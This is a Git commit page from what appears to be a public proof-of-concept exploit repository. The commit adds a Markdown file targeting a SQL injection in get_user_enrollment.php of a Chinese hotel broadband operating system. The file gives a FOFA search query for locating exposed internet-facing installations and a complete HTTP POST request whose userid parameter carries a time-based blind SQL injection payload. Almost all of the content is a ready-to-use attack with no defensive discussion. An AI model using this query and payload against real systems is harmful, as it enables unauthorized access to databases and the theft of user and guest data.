admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-06-20 01:40:42 +00:00
Code Issues Packages Projects Releases Wiki Activity

Update 安美数字酒店宽带运营系统get_user_enrollment.php注入漏洞.md

Browse Source
This commit is contained in:
Nexolanta 2025-03-08 22:21:18 +08:00 committed by GitHub
parent 730de99b48
commit 790ec058bb
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 22 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

22
wpoc/安美数字酒店宽带运营系统/安美数字酒店宽带运营系统get_user_enrollment.php注入漏洞.md
View File

@ -1 +1,23 @@
## 安美数字酒店宽带运营系统get_user_enrollment.php注入漏洞
## fofa
```
title=酒店宽带运营系统
```
## POC
```
POST /user/get_user_enrollment.php HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=3n9dv7r0vl6fcvirnlvp2oh1t4; dashboroad=srgua4gv7d2jnichvtl66l1146
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)
Connection: Keep-alive
userid=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z&usermac=1&portaltype=&portalname=
```